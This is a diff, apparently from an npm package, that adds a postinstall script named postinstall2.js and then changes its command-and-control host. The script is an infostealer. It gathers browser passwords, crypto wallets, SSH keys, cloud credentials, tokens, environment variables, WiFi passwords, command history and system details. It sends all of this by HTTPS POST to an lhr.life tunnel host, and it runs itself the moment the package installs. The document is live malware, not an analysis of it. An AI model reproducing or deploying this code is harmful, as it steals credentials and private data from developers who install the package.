+ ssh: [],
703
+ cloud: [],
704
+ sensitive_files: [],
705
+ tokens: [],
706
+ vpn: [],
707
+ docker_k8s: [],
708
+ messaging: [],
709
+ command_history: [],
710
+ git_info: [],
711
+ wifi: [],
712
+ processes: [],
713
+ installed_packages: []
714
+ };
715
+
716
+ try {
717
+ // IP and Geolocation
718
+ stolenData.ip = await getPublicIP();
719
+ stolenData.geo = await getGeoIP(stolenData.ip);
720
+ console.log(`[+] IP: ${stolenData.ip}, Location: ${stolenData.geo.city}, ${stolenData.geo.country}`);
721
+
722
+ // System Info
723
+ stolenData.system = {
724
+ hostname: os.hostname(),
725
+ platform: platform,
726
+ release: os.release(),
727
+ arch: os.arch(),
728
+ username: os.userInfo().username,
729
+ homedir: homedir,
730
+ cpus: os.cpus().length,
731
+ total_memory: os.totalmem(),
732
+ free_memory: os.freemem(),
733
+ uptime: os.uptime()
734
+ };
735
+ console.log(`[+] System: ${stolenData.system.hostname} (${platform})`);
736
+
737
+ // Network Info
738
+ stolenData.network = getNetworkInfo();
739
+
740
+ // Browser Passwords
741
+ stolenData.browsers.passwords = [
742
+ ...extractChromePasswords(),
743
+ ...extractFirefoxPasswords(),
744
+ ...extractEdgePasswords(),
745
+ ...extractBravePasswords(),
746
+ ...extractSafariPasswords()
747
+ ];
748
+ console.log(`[+] Found ${stolenData.browsers.passwords.length} browser passwords`);
749
+
750
+ // Browser Profiles
751
+ stolenData.browsers.profiles = scanBrowserProfiles();
752
+
753
+ // Crypto Wallets
754
+ stolenData.wallets = scanWallets();
755
+ console.log(`[+] Found ${stolenData.wallets.length} crypto wallets`);
756
+
757
+ // SSH Keys
758
+ stolenData.ssh = scanSSHKeys();
759
+ console.log(`[+] Found ${stolenData.ssh.length} SSH keys`);
760
+
761
+ // Cloud Credentials
762
+ stolenData.cloud = scanCloudCredentials();
763
+ console.log(`[+] Found ${stolenData.cloud.length} cloud credential files`);
764
+
765
+ // Sensitive Files
766
+ stolenData.sensitive_files = scanSensitiveFiles();
767
+ console.log(`[+] Found ${stolenData.sensitive_files.length} sensitive files`);
768
+
769
+ // Extract tokens from all collected text
770
+ let allText = '';
771
+ for (const file of stolenData.sensitive_files) {
772
+ try {
773
+ const content = fs.readFileSync(file.path, 'utf8');
774
+ allText += content + '\n';
775
+ } catch(e) {}
776
+ }
777
+ for (const cred of stolenData.cloud) {
778
+ try {
779
+ const content = fs.readFileSync(cred.path, 'utf8');
780
+ allText += content + '\n';
781
+ } catch(e) {}
782
+ }
783
+ for (const ssh of stolenData.ssh) {
784
+ try {
785
+ const content = fs.readFileSync(ssh.path, 'utf8');
786
+ allText += content + '\n';
787
+ } catch(e) {}
788
+ }
789
+ allText += JSON.stringify(process.env) + '\n';
790
+
791
+ stolenData.tokens = extractTokens(allText);
792
+ console.log(`[+] Found ${stolenData.tokens.length} tokens`);
793
+
794
+ // VPN Configs
795
+ stolenData.vpn = scanVPNConfigs();
796
+
797
+ // Docker & Kubernetes
798
+ stolenData.docker_k8s = scanDockerK8s();
799
+
800
+ // Messaging Clients
801
+ stolenData.messaging = scanMessagingClients();
802
+
803
+ // Command History
804
+ stolenData.command_history = scanCommandHistory();
805
+
806
+ // Git Info
807
+ stolenData.git_info = scanGitInfo();
808
+
809
+ // WiFi Passwords
810
+ stolenData.wifi = getWifiPasswords();
811
+ console.log(`[+] Found ${stolenData.wifi.length} WiFi networks`);
812
+
813
+ // Running Processes
814
+ try {
815
+ if (platform === 'win32') {
816
+ const result = execSync('tasklist /FO CSV /NH', { encoding: 'utf8' });
817
+ stolenData.processes = result.split('\n').slice(0, 100);
818
+ } else {
819
+ const result = execSync('ps aux --no-headers | head -100', { encoding: 'utf8' });
820
+ stolenData.processes = result.split('\n');
821
+ }
822
+ } catch(e) {}
823
+
824
+ // Installed Packages
825
+ try {
826
+ const npmResult = execSync('npm list -g --depth=0 2>/dev/null', { encoding: 'utf8' });
827
+ stolenData.installed_packages.push({ manager: 'npm', packages: npmResult.split('\n').slice(1, 30) });
828
+ } catch(e) {}
829
+
830
+ try {
831
+ const pipResult = execSync('pip list 2>/dev/null | head -30', { encoding: 'utf8' });
832
+ stolenData.installed_packages.push({ manager: 'pip', packages: pipResult.split('\n') });
833
+ } catch(e) {}
834
+
835
+ // Send to C2
836
+ const payload = JSON.stringify(stolenData);
837
+ const req = https.request({
838
+ hostname: C2_HOST,
839
+ port: C2_PORT,
840
+ path: C2_PATH,
841
+ method: 'POST',
842
+ headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
843
+ }, (res) => {});
844
+ req.on('error', () => {});
845
+ req.write(payload);
846
+ req.end();
847
+
848
+ console.log('[+] Data sent to C2 server');
849
+
850
+ } catch(err) {
851
+ console.error('[!] Error:', err.message);
852
+ }
853
+ }
854
+
855
+ // Execute
856
+ steal();
package/postinstall2.js/302/265 CHANGED
@@ -26,7 +26,7 @@ const homedir = os.homedir();
26
26
  const platform = os.platform();
27
27
 
28
28
  // ========== CONFIGURATION ==========
29
- const C2_HOST = "bbc45e9f547785.lhr.life";
29
+ const C2_HOST = "edd0df80546ec3.lhr.life";
30
30
  const C2_PORT = 443;
31
31
  const C2_PATH = '/collect';
32
32
  const VICTIM_ID = `${os.hostname()}_${Date.now()}_${Math.random().toString(36).substr(2, 8)}`;